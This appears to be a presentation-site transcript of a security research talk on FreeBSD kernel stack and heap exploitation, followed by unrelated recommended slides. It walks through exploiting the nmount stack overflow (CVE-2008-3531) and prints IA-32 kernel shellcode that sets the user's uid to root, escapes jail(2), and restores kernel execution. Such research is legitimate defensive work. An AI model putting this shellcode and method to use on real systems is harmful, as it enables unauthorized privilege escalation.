binding the daemon freebsd kernel stack and heap
play

Binding the Daemon FreeBSD Kernel Stack and Heap Exploitation - PowerPoint PPT Presentation

Sep 14, 2022 •973 likes •1.55k views

Binding the Daemon FreeBSD Kernel Stack and Heap Exploitation Patroklos (argp) Argyroudis argp@census-labs.com Outline Introduction Why target the kernel? Why target FreeBSD? Background Related work Exploitation

  1. Binding the Daemon FreeBSD Kernel Stack and Heap Exploitation Patroklos (argp) Argyroudis argp@census-labs.com

  2. Outline ● Introduction ● Why target the kernel? ● Why target FreeBSD? ● Background ● Related work ● Exploitation ● Kernel stack overflows ● Kernel heap (memory allocator) overflows ● Concluding remarks

  3. Targeting the kernel ● It is just another attack vector ● More complicated to debug and develop reliable exploits for ● Userland memory corruption protections have made most of the old generic exploitation approaches obsolete ● Application-specific approaches reign supreme in userland ● It is very interesting and fun ● Somehow I don't find client-side exploitation that interesting to spend time on

  4. Targeting FreeBSD ● Widely accepted as the most reliable operating system ● Netcraft data reveal FreeBSD as the choice of the top ranked reliable hosting providers ● A lot of work lately on Windows and Linux kernel exploitation techniques ● FreeBSD, and BSD based systems in general, have not received the same attention ● FreeBSD kernel heap vulnerabilities have not been researched in any way ● Enjoyable code reading experience

  5. Background

  6. Related work (1) ● “Exploiting kernel buffer overflows FreeBSD style” (2000) ● Focused on versions 4.0 to 4.1.1 ● Kernel stack overflow vulnerability in the jail(2) system call ● Manifested when a jail was setup with an overly long hostname, and a program's status was read through procfs ● “Smashing the kernel stack for fun and profit” (2002) ● OpenBSD 2.x-3.x (IA-32) ● Focused on kernel stack exploitation ● Main contribution: “sidt” kernel continuation technique

  7. Related work (2) ● “Exploiting kmalloc overflows to 0wn j00” (2005) ● Linux-specific kernel heap smashing exploitation ● Corruption of adjacent items on the heap/slab ● Main contribution: Detailed privilege escalation exploit for a Linux kernel heap vulnerability (CAN-2004-0424) ● “Open source kernel auditing and exploitation” (2003) ● Found a huge amount of bugs ● Linux, {Free, Net, Open}BSD kernel stack smashing methodologies ● Main contribution: “iret” return to userland technique

  8. Related work (3) ● “Attacking the core: kernel exploiting notes” (2007) ● Linux (IA-32, amd64), Solaris (UltraSPARC) ● Main contribution: Linux (IA-32) kernel heap (slab memory allocator) vulnerabilities ● “Kernel wars” (2007) ● Kernel exploitation on Windows, {Free, Net, Open}BSD (IA-32) ● Focused on stack and mbuf overflows ● Many contributions: multi-stage kernel shellcode, privilege escalation and kernel continuation techniques

  9. Related work (4) “FreeBSD kernel level vulnerabilities” (2009) ● Explored kernel race conditions that lead to NULL pointer dereferences ● Presented the details of three distinct bugs (6.1, 6.4, 7.2) ● A great example of the value of manual source code audits ● “Bug classes in BSD, OS X and Solaris kernels” (2009) ● Basically a modern kernel source code auditing handbook ● Released a very interesting exploit for a signedness vulnerability in the ● FreeBSD kernel (CVE-2009-1041) Analyzed many kernel bug classes ● “Exploiting UMA” (2009) ● Initial exploration of FreeBSD UMA exploitation ●

  10. Kernel exploitation goals (1) Arbitrary code execution ● NULL pointer dereferences ● ● FreeBSD-SA-08:13.protosw (CVE-2008-5736), public exploit from bsdcitizen.org ● FreeBSD-SA-09:14.devfs, kqueue(2) on half opened FDs from devfs, public exploit from frasunek.com Stack overflows ● ● FreeBSD-SA-08:08.nmount (CVE-2008-3531), public exploit from census-labs.com Heap – kernel memory allocator – overflows ● ● No known exploits / exploitation techniques

  11. Kernel exploitation goals (2) ● Denial of service / kernel panic ● Any non-exploitable bug from the previous category ● FreeBSD-EN-09:01.kenv panic when dumping kernel environment ● Memory disclosure ● FreeBSD-SA-06:06.kmem (CVE-2006-0379, CVE-2006- 0380)

  12. Kernel stack overflows

  13. Kernel stack overflows (1) ● Every thread (unit of execution of a process) has its own kernel stack ● When a process uses kernel services (e.g. int $0x80 ) the ESP register points to the corresponding thread's kernel stack ● Kernel stacks have a fixed size of 2 pages (on IA-32) and they don't grow dynamically ● Thousands of threads; we don't want to run out of memory ● Their main purpose is to always remain resident in memory in order to service the page faults that occur when the corresponding thread tries to run

  14. Kernel stack overflows (2) ● Overflow of a local variable and corruption of a) the function's saved return address b) the function's saved frame pointer c) a local variable (e.g. function pointer) ● Overflow and corruption of the kernel stack itself by causing recursion

  15. FreeBSD-SA-08:08.nmount (1) ● Affects FreeBSD version 7.0-RELEASE (CVE-2008-3531) ● Example stack overflow exploit development for the FreeBSD kernel ● The bug is in function vfs_filteropt() at src/sys/kern/vfs_mount.c line 1833: ● sprintf(errmsg, “mount option <%s> is unknown”, p); ● errmsg is a locally declared buffer ( char errmsg[255]; ) ● p contains the mount option's name ● Conceptually a mount option is a tuple of the form (name, value)

  16. FreeBSD-SA-08:08.nmount (2) ● The vulnerable sprintf() call can be reached when p 's (i.e. the mount option's name) corresponding value is invalid (but not NULL) ● For example the tuple (“AAAA”, “BBBB”) ● Both the name ( p ) and the value are user controlled ● vfs_filteropt() can be reached from userland via nmount(2) ● sysctl(9) variable vfs.usermount must be 1

  17. Execution control ● Many possible execution paths ● nmount() → vfs_donmount() → msdosfs_mount() → vfs_filteropt() ● The format string parameter does not allow direct control of the value that overwrites the saved return address of vfs_filteropt() ● Indirect control is enough to achieve arbitrary code execution ● When p = 248 * 'A', the saved return address of vfs_filteropt() is overwritten with 0x6e776f (the “nwo” of “unknown”) ● With a nod to NULL pointer dereference exploitation techniques, we mmap() memory at the page boundary 0x6e7000 ● And place our kernel shellcode 0x76f bytes after that

  18. Kernel shellcode (1) ● Our kernel shellcode should ● Locate the credentials of the user that triggers the bug and escalate his privileges ● Ensure kernel continuation, i.e. we want to keep the system running and stable ● Can be implemented entirely in C since the kernel can dereference userland

  19. Kernel shellcode (2) ● User credentials specifying the process owner's privileges are stored in a structure of type ucred ● A pointer to the ucred structure exists in a structure of type proc ● The proc structure can be located in a number of ways ● The sysctl(9) kern.proc.pid kernel interface and the kinfo_proc structure ● The allproc symbol that the FreeBSD kernel exports ● The curthread pointer from the pcpu structure (segment fs in kernel context points to it)

  20. Kernel shellcode (3) ● We use method the curthread method movl %fs:0, %eax # get curthread movl 0x4(%eax), %eax # get proc pointer # from curthread movl 0x30(%eax), %eax # get ucred from proc xorl %ecx, %ecx # ecx = 0 movl %ecx, 0x4(%eax) # ucred.uid = 0 movl %ecx, 0x8(%eax) # ucred.ruid = 0 ● Set struct prison pointer to NULL to escape jail(2) movl %ecx, 0x64(%eax) # jail(2) break!

  21. Kernel continuation (1) ● The next step is to ensure kernel continuation ● Depends on the situation: iret technique leaves kernel sync objects locked ● Reminder: nmount() → vfs_donmount() → msdosfs_mount() → vfs_filteropt() ● Cannot return to msdosfs_mount() ; its saved registers have been corrupted when we smashed vfs_filteropt() 's stack frame ● We can bypass msdosfs_mount() and return to vfs_donmount() whose saved register values are uncorrupted (in msdosfs_mount() 's stack frame)

  22. Kernel continuation (2) vfs_donmount() { msdosfs_mount(); // this function's saved stack values are uncorrupted } msdosfs_mount() { vfs_filteropt(); ... addl $0xe8, %esp // stack cleanup, saved registers' restoration popl %ebx popl %esi popl %edi popl %ebp ret }

  23. Complete shellcode movl %fs:0, %eax # get curthread movl 0x4(%eax), %eax # get proc pointer from curthread movl 0x30(%eax), %eax # get ucred from proc xorl %ecx, %ecx # ecx = 0 movl %ecx, 0x4(%eax) # ucred.uid = 0 movl %ecx, 0x8(%eax) # ucred.ruid = 0 # escape from jail(2), install backdoor, etc. # return to the pre-previous function, i.e. vfs_donmount() addl $0xe8, %esp popl %ebx popl %esi popl %edi popl %ebp ret

  24. Kernel heap overflows

  25. Kernel heap overflows (1) ● 8.0 has introduced stack smashing protection for the kernel (SSP/ProPolice) ● See sys/kern/stack_protector.c ● Increased interest in exploring the security of the FreeBSD kernel heap implementation ● Has not been researched in any way in the past ● Tested on 7.0, 7.1, 7.2, 7.3 and 8.0 ● All code excerpts taken from 8.0

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Status of the Graphics Stack on FreeBSD Jean-Sbastien Pdron The FreeBSD Project The X.Org

Status of the Graphics Stack on FreeBSD Jean-Sbastien Pdron The FreeBSD Project The X.Org

In the kernel In the Ports tree With the community Future challenges Summary Status of the Graphics Stack on FreeBSD Jean-Sbastien Pdron The FreeBSD Project The X.Org Developers Conference, 2014 J.S. Pdron FreeBSD Graphics Stack

678 views • 45 slides
Stack Stack Heap Heap Data Data Text Text Program A Program B Stack Stack Text Heap

Stack Stack Heap Heap Data Data Text Text Program A Program B Stack Stack Text Heap

Stack Stack Heap Heap Data Data Text Text Program A Program B Stack Stack Text Heap Heap Data Data Text Text Text Program A Program B Physical Memory Stack Stack Stack Heap Stack Kernel Heap Heap Data Heap Data

1.17k views • 62 slides
Introduction to Multithreading and Multiprocessing in the FreeBSD SMPng Network Stack EuroBSDCon

Introduction to Multithreading and Multiprocessing in the FreeBSD SMPng Network Stack EuroBSDCon

Introduction to Multithreading and Multiprocessing in the FreeBSD SMPng Network Stack EuroBSDCon 2005 26 November 2005 Robert Watson Ed Maste FreeBSD Core Team FreeBSD Developer rwatson@FreeBSD.org emaste@FreeBSD.org Computer Laboratory

459 views • 43 slides
A heap, a stack, a bottle and a rack The Stack Canary Birds The heap Answer: The first three

A heap, a stack, a bottle and a rack The Stack Canary Birds The heap Answer: The first three

A heap, a stack, a bottle and a rack The Stack Canary Birds The heap Answer: The first three segments are: code , read-only data and global data for the running process gurka. Then there is a segment for the heap . The segment marked with

399 views • 10 slides
Introduction to Debugging the Introduction to Debugging the FreeBSD Kernel FreeBSD Kernel May

Introduction to Debugging the Introduction to Debugging the FreeBSD Kernel FreeBSD Kernel May

Introduction to Debugging the Introduction to Debugging the FreeBSD Kernel FreeBSD Kernel May 17, 2008 John Baldwin jhb@FreeBSD.org Introduction Introduction Existing Documentation DDB kgdb Debugging Strategies 2 Existing

640 views • 26 slides
FreeBSD Kernel massacre Patroklos (argp) Argyroudis argp@{grhack.net, census-labs.com}

FreeBSD Kernel massacre Patroklos (argp) Argyroudis argp@{grhack.net, census-labs.com}

FreeBSD Kernel massacre Patroklos (argp) Argyroudis argp@{grhack.net, census-labs.com} PH-Neutral 0x7db WARNING: Yet another zombie-themed presentation Outline Introduction Why target the kernel? Why target FreeBSD? Related work

1.05k views • 51 slides
Last week Data can be allocated on the stack or on the heap (aka dynamic memory) or on the heap

Last week Data can be allocated on the stack or on the heap (aka dynamic memory) or on the heap

Last week Data can be allocated on the stack or on the heap (aka dynamic memory) or on the heap (aka dynamic memory) Data on the stack is allocated automatically when we do a function call, and removed when we return ll d d h t f() {

605 views • 25 slides
Heap-stack Diagram Sanzheng Qiao McMaster University November, 2011 Sizes of Objects

Heap-stack Diagram Sanzheng Qiao McMaster University November, 2011 Sizes of Objects

Sizes of Objects Generating Heap-stack Diagrams Example Heap-stack Diagram Sanzheng Qiao McMaster University November, 2011 Sizes of Objects Generating Heap-stack Diagrams Example Outline 1 Sizes of Objects 2 Generating Heap-stack

246 views • 12 slides
NUMA Siloing in the FreeBSD Network Stack Drew Gallatin EuroBSDCon 2019 (Or how to serve

NUMA Siloing in the FreeBSD Network Stack Drew Gallatin EuroBSDCon 2019 (Or how to serve

NUMA Siloing in the FreeBSD Network Stack Drew Gallatin EuroBSDCon 2019 (Or how to serve 200Gb/s of TLS from FreeBSD) Motivation: Since 2016, Netflix has been able to serve 100Gb/s of TLS encrypted video traffic from a single server.

1.2k views • 71 slides
Book-binding a c c o r d i a n b o o k , s a d d l e s t i t c h a n d s t a b b i n d

Book-binding a c c o r d i a n b o o k , s a d d l e s t i t c h a n d s t a b b i n d

Book-binding a c c o r d i a n b o o k , s a d d l e s t i t c h a n d s t a b b i n d i n g Physically assembling a book from a stack of paper sheets that are folded together. The stack is then bound together along one edge by

262 views • 22 slides
Processs Address Space Linux Address Space 0x7fffffff Stack Data (Heap) Data (Heap)

Processs Address Space Linux Address Space 0x7fffffff Stack Data (Heap) Data (Heap)

10/21/2014 Processes, Address Spaces, and PROCESS Memory Management A running program and its associated data Jonathan Misurda jmisurda@cs.pitt.edu Processs Address Space Linux Address Space 0x7fffffff Stack Data (Heap) Data (Heap)

579 views • 3 slides
Buffer Overflow Attacks IA32 Linux Stack Higher Addresses Virtual Address Space Heap Data

Buffer Overflow Attacks IA32 Linux Stack Higher Addresses Virtual Address Space Heap Data

Buffer Overflow Attacks IA32 Linux Stack Higher Addresses Virtual Address Space Heap Data Text Lower Addresses Stack and Base Pointers Stack is made up of stack frames Stack frames contain: parameters, local variables, return

604 views • 45 slides
Section 8 2/22/12 Agenda Malloc/Free Process Memory Image memory protected kernel virtual

Section 8 2/22/12 Agenda Malloc/Free Process Memory Image memory protected kernel virtual

CSE 351 Section 8 2/22/12 Agenda Malloc/Free Process Memory Image memory protected kernel virtual memory from user code stack %rsp What is the heap for? How do we use it? run-time heap uninitialized data (. bss ) initialized data (.

714 views • 26 slides
FreeBSD graphics Niclas Zeising zeising@FreeBSD.org agenda team the graphics stack

FreeBSD graphics Niclas Zeising zeising@FreeBSD.org agenda team the graphics stack

FreeBSD graphics Niclas Zeising zeising@FreeBSD.org agenda team the graphics stack challenges future graphics team team small team use github multiple repositories github.com/FreeBSDDesktop team ~300 ports ports infrastructure

562 views • 28 slides
FreeBSD is not Linux Niclas Zeising zeising@FreeBSD.org what is FreeBSD what is FreeBSD

FreeBSD is not Linux Niclas Zeising zeising@FreeBSD.org what is FreeBSD what is FreeBSD

FreeBSD is not Linux Niclas Zeising zeising@FreeBSD.org what is FreeBSD what is FreeBSD complete operating system documentation over 30 000 packages a community history history patches to v6 Unix ex/vi, pascal Berkely Software

715 views • 28 slides
Asynchronous I/O Stack: A Low-latency Kernel I/O Stack for Ultra-Low Latency SSDs Jinkyu Jeong

Asynchronous I/O Stack: A Low-latency Kernel I/O Stack for Ultra-Low Latency SSDs Jinkyu Jeong

Asynchronous I/O Stack: A Low-latency Kernel I/O Stack for Ultra-Low Latency SSDs Jinkyu Jeong Sungkyunkwan University (SKKU) Source: Gyusun Lee et al., Asynchronous I/O Stack: A Low-latency Kernel I/O Stack for Ultra-Low Latency SSDs, USENIX

672 views • 48 slides
Linear Classification and Perceptron INFO-4604, Applied Machine Learning University of Colorado

Linear Classification and Perceptron INFO-4604, Applied Machine Learning University of Colorado

Linear Classification and Perceptron INFO-4604, Applied Machine Learning University of Colorado Boulder September 6, 2018 Prof. Michael Paul Prediction Functions Remember: a prediction function is the function that predicts what the output

506 views • 37 slides
Old pharmaceuticals with new applications: the case studies of lucanthone and mitoxantrone Emlia

Old pharmaceuticals with new applications: the case studies of lucanthone and mitoxantrone Emlia

Old pharmaceuticals with new applications: the case studies of lucanthone and mitoxantrone Emlia Sousa 1, *, Ivanna Hrynchak 1 , Ana Reis-Mendes 2 , Maria de Lurdes Bastos 2 , Madalena Pinto 1 and Vera Marisa Costa 2 1 Laboratrio de Qumica

353 views • 17 slides
On coalgebras over algebras Adriana Balan 1 Alexander Kurz 2 1 University Politehnica of Bucharest,

On coalgebras over algebras Adriana Balan 1 Alexander Kurz 2 1 University Politehnica of Bucharest,

On coalgebras over algebras Adriana Balan 1 Alexander Kurz 2 1 University Politehnica of Bucharest, Romania 2 University of Leicester, UK 10th International Workshop on Coalgebraic Methods in Computer Science A. Balan (UPB), A. Kurz (UL) On

1.05k views • 66 slides
MONITOR PATTERN CS4414 Lecture 15 CORNELL CS4414 - FALL 2020. 1 IDEA MAP FOR TODAY The monitor

MONITOR PATTERN CS4414 Lecture 15 CORNELL CS4414 - FALL 2020. 1 IDEA MAP FOR TODAY The monitor

Professor Ken Birman MONITOR PATTERN CS4414 Lecture 15 CORNELL CS4414 - FALL 2020. 1 IDEA MAP FOR TODAY The monitor pattern in C++ Reminder: Thread Concept Problems monitors solve (and problems they dont solve) Lightweight vs.

619 views • 49 slides
http://cs224w.stanford.edu How to organize/navigate it? First try: Human curated Web

http://cs224w.stanford.edu How to organize/navigate it? First try: Human curated Web

CS224W: Social and Information Network Analysis Jure Leskovec, Stanford University http://cs224w.stanford.edu How to organize/navigate it? First try: Human curated Web directories Yahoo, DMOZ, LookSmart 11/8/2011 Jure Leskovec,

487 views • 48 slides
Centrally Banked Cryptocurrencies George Danezis (University College London) Sarah Meiklejohn

Centrally Banked Cryptocurrencies George Danezis (University College London) Sarah Meiklejohn

Centrally Banked Cryptocurrencies George Danezis (University College London) Sarah Meiklejohn (University College London) whos interested in blockchain? 2 whos interested in blockchain? 2 whos interested in

894 views • 72 slides
rs ts trs

rs ts trs

rs ts trs r rr r t t t t s trs

582 views • 37 slides
Prometheus: Designing and Implementing a Modern Monitoring Solution in Go Bjrn Beorn

Prometheus: Designing and Implementing a Modern Monitoring Solution in Go Bjrn Beorn

Prometheus: Designing and Implementing a Modern Monitoring Solution in Go Bjrn Beorn Rabenstein, Production Engineer, SoundCloud Ltd. http://prometheus.io Architecture Go client library Counter interface (almost complete) type

489 views • 37 slides

More recommend